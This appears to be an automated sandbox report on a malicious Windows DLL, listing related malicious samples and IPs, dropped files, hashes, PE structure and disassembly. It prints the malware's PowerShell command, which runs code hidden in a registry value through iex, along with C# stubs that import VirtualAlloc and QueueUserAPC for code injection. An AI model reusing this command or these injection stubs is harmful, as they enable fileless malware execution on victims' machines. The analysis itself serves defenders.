l-0007.l-dc-msedge.net | 2oCOO5LbPu.dll | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | rXN8OIpbzz.dll | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | Invoice#396.html | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | Urgentn#U00a1 objedn#U00a0vka.pdf.exe | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | pDut.dll | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | HxEWwh74qT.dll | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | 6253ed88d7cd5.dll | malicious | 13.107.43.16
l-0007.l-dc-msedge.net | 624c84a8263d3.dll | malicious | 13.107.43.16
Match | Associated Sample Name / URL | Detection | Context
AS-SOFTPLUSCH | qOfIxt1fnQ.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | 2oCOO5LbPu.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | rXN8OIpbzz.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | GlJdt15gDI.dll | malicious | 185.189.151.28
AS-SOFTPLUSCH | o52M6ZqBFp | malicious | 176.10.116.173
AS-SOFTPLUSCH | com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apk | malicious | 176.10.119.156
AS-SOFTPLUSCH | com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apk | malicious | 176.10.119.156
AS-SOFTPLUSCH | com.pagnotto28.sellsourcecode.alpha-6-apkplz.net.apk | malicious | 176.10.119.156
AS-SOFTPLUSCH | URGENT REQUEST FOR QUOTE_____Pdf.exe | malicious | 91.192.100.6
AS-SOFTPLUSCH | Powerful Cleaner Antivirus_v1.9.apk | malicious | 176.10.119.156
AS-SOFTPLUSCH | K74MviOR7d | malicious | 185.189.149.113
AS-SOFTPLUSCH | xIOggpNWfl.exe | malicious | 176.10.107.180
AS-SOFTPLUSCH | 2X3f1ykTmM.exe | malicious | 176.10.99.208
AS-SOFTPLUSCH | lwRhzjuYIg.exe | malicious | 176.10.99.203
AS-SOFTPLUSCH | d03hwI54V0.exe | malicious | 176.10.104.240
AS-SOFTPLUSCH | tbsvr | malicious | 176.10.107.180
AS-SOFTPLUSCH | 1p1EpP7mrs.exe | malicious | 185.189.151.142
AS-SOFTPLUSCH | yxvnSxhHKv | malicious | 91.201.59.197
AS-SOFTPLUSCH | xTvIsmAee2.exe | malicious | 176.10.119.29
AS-SOFTPLUSCH | b6pQZxxOuM.exe | malicious | 176.10.119.29
                              No context
                              No context
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11606
                              Entropy (8bit):4.8910535897909355
                              Encrypted:false
                              SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                              MD5:F84F6C99316F038F964F3A6DB900038F
                              SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                              SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                              SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1192
                              Entropy (8bit):5.325275554903011
                              Encrypted:false
                              SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                              MD5:05CF074042A017A42C1877FC5DB819AB
                              SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                              SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                              SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9748061757983675
                              Encrypted:false
                              SSDEEP:24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K
                              MD5:B25228E0D789A80CC458BDEDCA074352
                              SHA1:D02F77745E89EDE624F705B49991653478861CDE
                              SHA-256:AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951
                              SHA-512:471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                              Category:dropped
                              Size (bytes):1328
                              Entropy (8bit):3.9834931582727697
                              Encrypted:false
                              SSDEEP:24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K
                              MD5:3216E688A820A84F56F4B051422672D5
                              SHA1:66A45E83433BA569C1539A55EE95B8715BF3CDB9
                              SHA-256:E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29
                              SHA-512:2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.1141398576088117
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX
                              MD5:476755BF56A208B33F9C4651A06EE5A5
                              SHA1:828C47F319540793ABFD06234431820E5594A420
                              SHA-256:EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C
                              SHA-512:4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):392
                              Entropy (8bit):4.988829579018284
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                              MD5:80545CB568082AB66554E902D9291782
                              SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                              SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                              SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                              Malicious:false
Preview:
    using System;
    using System.Runtime.InteropServices;

    namespace W32
    {
        public class buvbcy
        {
            [DllImport("kernel32")]
            public static extern IntPtr GetCurrentProcess();
            [DllImport("kernel32")]
            public static extern void SleepEx(uint jujqjjcr,uint fvu);
            [DllImport("kernel32")]
            public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);
        }
    }
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):369
                              Entropy (8bit):5.283593156851968
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9
                              MD5:9BA74AF8C7DB03DB598E428C80A39C24
                              SHA1:1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C
                              SHA-256:29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722
                              SHA-512:6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9
                              Malicious:false
Preview:/t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.600576810696372
                              Encrypted:false
                              SSDEEP:24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq
                              MD5:DB32AF94E50432F083E1DEA228EEF8D4
                              SHA1:7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E
                              SHA-256:C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD
                              SHA-512:7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.346663629193138
                              Encrypted:false
                              SSDEEP:24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj
                              MD5:2F9D5A7D317AB29D714CEFE888F56699
                              SHA1:2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356
                              SHA-256:728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB
                              SHA-512:6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069
                              Malicious:false
Preview:
    C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.0.cs"

    Microsoft (R) Visual C# Compiler version 4.7.3056.0
    for C# 5
    Copyright (C) Microsoft Corporation. All rights reserved.

    This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):652
                              Entropy (8bit):3.093636689580821
                              Encrypted:false
                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX
                              MD5:27A58DEC34A8A930EAF493E122C1D762
                              SHA1:84E4A3CA94FA31FF623DE9EE39782AC021D93B32
                              SHA-256:C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665
                              SHA-512:D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074
                              Malicious:false
Preview:(binary data)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):5.058106976759534
                              Encrypted:false
                              SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                              MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                              SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                              SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                              SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                              Malicious:false
Preview:
    using System;
    using System.Runtime.InteropServices;

    namespace W32
    {
        public class bju
        {
            [DllImport("kernel32")]
            public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);
            [DllImport("kernel32")]
            public static extern IntPtr GetCurrentThreadId();
            [DllImport("kernel32")]
            public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);
        }
    }
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                              Category:dropped
                              Size (bytes):369
                              Entropy (8bit):5.182200628670966
                              Encrypted:false
                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m
                              MD5:8CB0C7CD433BDC2F02299B6932B4A9E3
                              SHA1:00663A78D6DAD361F367FD49A112A56B5C7DFA2B
                              SHA-256:97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13
                              SHA-512:3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902
                              Malicious:false
                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):3584
                              Entropy (8bit):2.6207839132053006
                              Encrypted:false
                              SSDEEP:24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq
                              MD5:1F0860CDD9E8F6B4501F25728D2131B6
                              SHA1:1126BDC01913B693028ECB663123381889362DA8
                              SHA-256:3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B
                              SHA-512:E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5
                              Malicious:false
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.rb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):866
                              Entropy (8bit):5.307968253776901
                              Encrypted:false
                              SSDEEP:24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj
                              MD5:CEA73A1E9F1D1CC3A29CF5AAE996602A
                              SHA1:6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9
                              SHA-256:C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7
                              SHA-512:1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A
                              Malicious:false
                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1343
                              Entropy (8bit):5.36590430076155
                              Encrypted:false
                              SSDEEP:24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb
                              MD5:3FD39DAE5C6C053C927C7C421DF22346
                              SHA1:648958C510D633CECD2033A0B76B04A2B8CA6993
                              SHA-256:733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E
                              SHA-512:8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C
                              Malicious:false
                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504162806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6644..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504162806..**********************..PS>new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.E
                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.2386475978649285
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:xaj0e933Uv.dll
                              File size:442368
                              MD5:69e570a35f63ea12cbad7a10b25a6ea4
                              SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
                              SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
                              SHA512:85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca
                              SSDEEP:6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7
                              TLSH:D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706
                              File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......
                              Icon Hash:9068eccc64f6e2ad
                              Entrypoint:0x401430
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e
                              Instruction
                              push ebp
                              mov ebp, esp
                              add ecx, FFFFFFFFh
                              call 00007F4F08B3F6FCh
                              pop eax
                              pop eax
                              mov dword ptr [00414544h], eax
                              mov edx, dword ptr [00414660h]
                              sub edx, 00005289h
                              call edx
                              ret
                              int3
                              push esi
                              mov eax, ebx
                              mov dword ptr [00414540h], eax
                              pop dword ptr [00414538h]
                              mov dword ptr [00414548h], ebp
                              mov dword ptr [0041453Ch], edi
                              sub dword ptr [00414548h], FFFFFFFCh
                              loop 00007F4F08B3F6A5h
                              mov dword ptr [ebp+00h], eax
                              nop
                              ret
                              lea ecx, ebx
                              pop es
                              mov ds, word ptr [ecx]
                              lodsb
                              lea ebp, dword ptr [ecx+6B2EEEC3h]
                              movsb
                              xchg eax, esi
                              xchg dword ptr [ebx], esp
                              shl byte ptr [C2100869h], 1
                              loopne 00007F4F08B3F698h
                              pop eax
                              or ecx, dword ptr [ebx-5F28A8CFh]
                              pop ebx
                              je 00007F4F08B3F716h
                              sbb dword ptr [esi], eax
                              sbb bh, dh
                              mov ebp, A52AB60Ah
                              xor al, F7h
                              sbb eax, 442A8BDAh
                              mov edx, 8289DCF1h
                              wait
                              sub byte ptr [eax-20h], dh
                              pop ecx
                              or esi, edi
                              xchg eax, esp
                              loop 00007F4F08B3F757h
                              xchg eax, edi
                              sti
                              cmp eax, 3B0AD66Fh
                              dec ebp
                              mov esp, E193F8C3h
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02187881889 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                               .rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.18017578125 | data | 3.71231531364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373657226562 | data | 6.02583875365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                               .crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                               .erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                               .rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country
                               RT_BITMAP | 0x62360 | 0x666 | data | English | United States
                               RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                               RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States
                               RT_ICON | 0x697d0 | 0xea8 | data | English | United States
                               RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                               RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                               RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States
                               RT_DIALOG | 0x6b540 | 0x120 | data | English | United States
                               RT_DIALOG | 0x6b660 | 0x158 | data | English | United States
                               RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States
                               RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States
                               RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States
                               RT_DIALOG | 0x6bb58 | 0xee | data | English | United States
                               RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States
                               RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States
                               DLL | Import
                               KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                               OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx
